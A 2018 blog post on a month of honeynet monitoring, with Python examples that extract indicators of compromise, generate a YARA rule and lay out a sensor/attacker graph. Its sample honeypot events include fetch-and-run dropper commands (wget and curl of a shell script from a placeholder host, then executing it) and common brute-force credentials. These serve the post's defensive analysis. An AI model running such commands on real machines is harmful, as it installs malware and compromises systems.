4n6strider

Honeynet: A 30 days of network traffic security monitoring

The picture above shows the network traffic as observed by the Honeynet.
Botnets attempting SSH brute-forcing of exposed services, DDoS attacks, security researchers' activity, vulnerability scanners, hacktivist campaigns, you name it. It is all there.
But let's start from the beginning.

This study covers only 30 days of monitoring, to keep the visualization part of the data processing manageable.

Granted, a skilled hacker does not usually fall for a honeypot (an intentionally vulnerable system exposed to attacks), so the network of honeypots, the Honeynet, serves mostly to support other security monitoring: spotting script kiddies, new botnet campaigns, or automated attacks currently happening "in the wild".

Alternatively, future hacks can be caught by the Honeynet at the stage when they are still PoCs, proofs of concept, rather than real hacks.

By analyzing the data from the Honeynet, indicators of compromise (IoCs) can be extracted too.
Also, by analyzing the strings found in captured samples, YARA rules can be generated to monitor the propagation of malware samples and to spot an eventual infection of a system early.

All of this also supports the Incident Response process itself. The data is especially handy during the initial drafting of the security incident's timeline.
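As an added example of the IoC extraction and YARA rule generation described above (this is example code written for this page, not code from the original post or from any honeypot project): the script parses constructed honeypot events in a generic JSON-lines layout (the field names, sensor IDs, addresses and the all-`f` hash are assumptions made up for the example, not a real honeypot's export format), collects attacker IPs, download URLs, sample hashes and the most-tried credentials, and then derives a YARA rule from the printable strings of a constructed sample blob, dropping strings that are too generic to be useful. The `matches` helper only approximates the rule's condition; in practice the generated rule text would be compiled and run with the `yara` CLI or `yara-python`.

```python
"""Extract IoCs from honeynet events and derive a YARA rule from a sample's strings."""
import json
import re
from collections import Counter

# Constructed honeypot events in a generic JSON-lines layout. Field names,
# sensor IDs, addresses and the hash are made up for this example.
EVENTS = """\
{"ts":"2018-05-01T10:02:11Z","sensor":"h7k2p","src_ip":"198.51.100.23","event":"login.failed","user":"root","password":"123456"}
{"ts":"2018-05-01T10:02:13Z","sensor":"h7k2p","src_ip":"198.51.100.23","event":"login.failed","user":"root","password":"admin"}
{"ts":"2018-05-01T10:02:19Z","sensor":"h7k2p","src_ip":"198.51.100.23","event":"login.success","user":"root","password":"toor"}
{"ts":"2018-05-01T10:02:40Z","sensor":"h7k2p","src_ip":"198.51.100.23","event":"command","input":"cd /tmp; wget http://203.0.113.7/x/bins.sh; chmod +x bins.sh; ./bins.sh"}
{"ts":"2018-05-01T10:02:55Z","sensor":"h7k2p","src_ip":"198.51.100.23","event":"download","url":"http://203.0.113.7/x/bins.sh","sha256":"ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"}
{"ts":"2018-05-02T04:17:03Z","sensor":"q9m1x","src_ip":"192.0.2.88","event":"login.failed","user":"admin","password":"admin"}
{"ts":"2018-05-02T04:17:04Z","sensor":"q9m1x","src_ip":"192.0.2.88","event":"login.failed","user":"root","password":"admin"}
{"ts":"2018-05-02T04:17:09Z","sensor":"q9m1x","src_ip":"192.0.2.88","event":"command","input":"curl -O http://203.0.113.7/x/bins.sh"}
"""

# Constructed stand-in for a captured sample: an ELF-looking header plus a
# few embedded strings. Not a real binary.
SAMPLE = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"/tmp/bins.sh\x00"
          + b"User-Agent: Mozilla/5.0\x00" + b"http://203.0.113.7/x/\x00"
          + b"busybox wget\x00")

# Strings that also occur in plenty of benign software; a rule built on them
# would fire too widely. A constructed denylist for this example.
GENERIC_STRINGS = {"User-Agent: Mozilla/5.0"}

URL_RE = re.compile(r"https?://[^\s;'\"]+")


def parse_events(text):
    """One JSON object per line; blank lines are skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def extract_iocs(events):
    """Collect attacker IPs, URLs seen in commands and downloads, sample hashes,
    and the credential pairs tried most often."""
    ips, urls, hashes, creds = set(), set(), set(), Counter()
    for ev in events:
        ips.add(ev["src_ip"])
        if ev["event"] == "command":
            urls.update(URL_RE.findall(ev["input"]))
        elif ev["event"] == "download":
            urls.add(ev["url"])
            hashes.add(ev["sha256"])
        elif ev["event"].startswith("login."):
            creds[(ev["user"], ev["password"])] += 1
    return {"ips": sorted(ips), "urls": sorted(urls), "hashes": sorted(hashes),
            "top_credentials": creds.most_common(3)}


def extract_strings(data, min_len=8):
    """Printable ASCII runs of at least min_len bytes, like the strings(1) tool."""
    rx = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in rx.finditer(data)]


def select_rule_strings(strings):
    """Keep unique strings that are not on the generic denylist, in order."""
    chosen = []
    for s in strings:
        if s not in GENERIC_STRINGS and s not in chosen:
            chosen.append(s)
    return chosen


def build_yara_rule(name, strings, sha256):
    """Render a YARA rule; requiring all-but-one string tolerates one changed
    string in a recompiled variant. Returns (rule_text, strings_needed)."""
    needed = max(1, len(strings) - 1)
    lines = [f"rule {name}", "{", "    meta:",
             '        description = "strings from a sample captured by the honeynet"',
             f'        sha256 = "{sha256}"', "    strings:"]
    for i, s in enumerate(strings):
        esc = s.replace("\\", "\\\\").replace('"', '\\"')
        lines.append(f'        $s{i} = "{esc}"')
    lines += ["    condition:", f"        {needed} of them", "}"]
    return "\n".join(lines), needed


def matches(strings, needed, data):
    """Approximate the rule condition without a YARA engine: count how many
    of the rule strings occur in the data."""
    return sum(s.encode() in data for s in strings) >= needed


if __name__ == "__main__":
    iocs = extract_iocs(parse_events(EVENTS))
    print(json.dumps(iocs, indent=2))
    chosen = select_rule_strings(extract_strings(SAMPLE))
    rule, needed = build_yara_rule("honeynet_bins_sh", chosen, iocs["hashes"][0])
    print(rule)
    print("sample matches:", matches(chosen, needed, SAMPLE))
```

The generic-string denylist is the step that matters most in practice: strings like user agents, libc symbols or common shell commands appear in countless benign files, so a rule built from them produces noise instead of an early infection signal.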

The second picture shows the same modulation of the data, only with labels. In the center are readable labels of the most productive sensors.
[A sensor ID is a random string generated by the system when the sensor is created.]

When using graph theory for Honeynet security data analysis, it is beneficial to first transform the graph visual using, for example, the ForceAtlas algorithm.

Personally, I am very fond of this particular ForceAtlas algorithm because it is based on the laws of physics, so the outputs come out very natural and readable.
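As an added example of the graph approach described above (written for this page, not code from the original post or from Gephi): the script builds a bipartite attacker/sensor graph from constructed, aggregated records, ranks the most productive sensors by event count and distinct attacker IPs, and lays the graph out with a minimal force-directed algorithm of the same family as ForceAtlas (linear attraction along edges scaled by the edge weight, degree-weighted repulsion between all node pairs, linear cooling). The force model, constants and all record values are assumptions for the example; it is not Gephi's ForceAtlas implementation.

```python
"""Sensor/attacker graph from honeynet records with a force-directed layout."""
import math
import random
from collections import Counter, defaultdict

# Constructed (src_ip, sensor_id, event_count) records, as they might be
# aggregated from 30 days of honeypot logs. Sensor IDs are random strings,
# as in the post; every value here is made up for the example.
RECORDS = [
    ("198.51.100.23", "h7k2p", 120),
    ("198.51.100.23", "q9m1x", 15),
    ("192.0.2.88", "h7k2p", 40),
    ("203.0.113.9", "q9m1x", 8),
    ("203.0.113.9", "h7k2p", 3),
    ("192.0.2.150", "z4c8v", 9),
]


def build_graph(records):
    """Bipartite weighted graph: attacker IPs on one side, sensors on the other.
    Returns (sorted node list, {(ip, sensor): total events})."""
    edges = {}
    for ip, sensor, n in records:
        edges[(ip, sensor)] = edges.get((ip, sensor), 0) + n
    nodes = sorted({u for edge in edges for u in edge})
    return nodes, edges


def sensor_ranking(records):
    """Most productive sensors first: (sensor, total events, distinct IPs)."""
    total, ips = Counter(), defaultdict(set)
    for ip, sensor, n in records:
        total[sensor] += n
        ips[sensor].add(ip)
    return [(s, total[s], len(ips[s])) for s, _ in total.most_common()]


def degrees(edges):
    deg = Counter()
    for u, v in edges:
        deg[u] += 1
        deg[v] += 1
    return deg


def force_layout(nodes, edges, iterations=300, k=0.005, step0=0.1, seed=1):
    """Simplified ForceAtlas-style layout (an assumption, not Gephi's code):
    repulsion k*(deg_u+1)*(deg_v+1)/d between all pairs, attraction
    0.2*log1p(weight)*d along edges, displacement capped by a cooling step."""
    rng = random.Random(seed)
    pos = {n: [rng.random(), rng.random()] for n in nodes}
    deg = degrees(edges)
    for it in range(iterations):
        step = step0 * (1 - it / iterations)          # linear cooling
        disp = {n: [0.0, 0.0] for n in nodes}
        for i, u in enumerate(nodes):                  # repulsion, all pairs
            for v in nodes[i + 1:]:
                dx, dy = pos[u][0] - pos[v][0], pos[u][1] - pos[v][1]
                d = math.hypot(dx, dy) or 1e-9
                f = k * (deg[u] + 1) * (deg[v] + 1) / d
                disp[u][0] += f * dx / d; disp[u][1] += f * dy / d
                disp[v][0] -= f * dx / d; disp[v][1] -= f * dy / d
        for (u, v), w in edges.items():                # attraction along edges
            dx, dy = pos[u][0] - pos[v][0], pos[u][1] - pos[v][1]
            d = math.hypot(dx, dy) or 1e-9
            f = 0.2 * math.log1p(w) * d                # heavier edges pull harder
            disp[u][0] -= f * dx / d; disp[u][1] -= f * dy / d
            disp[v][0] += f * dx / d; disp[v][1] += f * dy / d
        for n in nodes:                                # move, capped by step
            mx, my = disp[n]
            m = math.hypot(mx, my)
            if m > step:
                mx, my = mx / m * step, my / m * step
            pos[n][0] += mx
            pos[n][1] += my
    return pos


def distance(pos, a, b):
    return math.hypot(pos[a][0] - pos[b][0], pos[a][1] - pos[b][1])


if __name__ == "__main__":
    for sensor, events, n_ips in sensor_ranking(RECORDS):
        print(f"{sensor}: {events} events from {n_ips} IPs")
    nodes, edges = build_graph(RECORDS)
    layout = force_layout(nodes, edges)
    for n in nodes:
        print(f"{n:>14} at ({layout[n][0]:.2f}, {layout[n][1]:.2f})")
```

In the resulting layout, sensors hit by the same attackers end up clustered with them, while a sensor that only ever sees its own isolated scanners drifts away from the rest; that separation is what makes the structure of the traffic visible, and in the ranking it is the sensor with many events from few IPs versus few events from many IPs that distinguishes a single persistent bot from broad scanning.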

This is the picture, finally processed to reveal the structure of the traffic within the Honeynet itself.
It serves security data analysis, the evaluation of individual sensors' performance and, last but not least, Honeynet maintenance purposes:

© 2018 4n6strider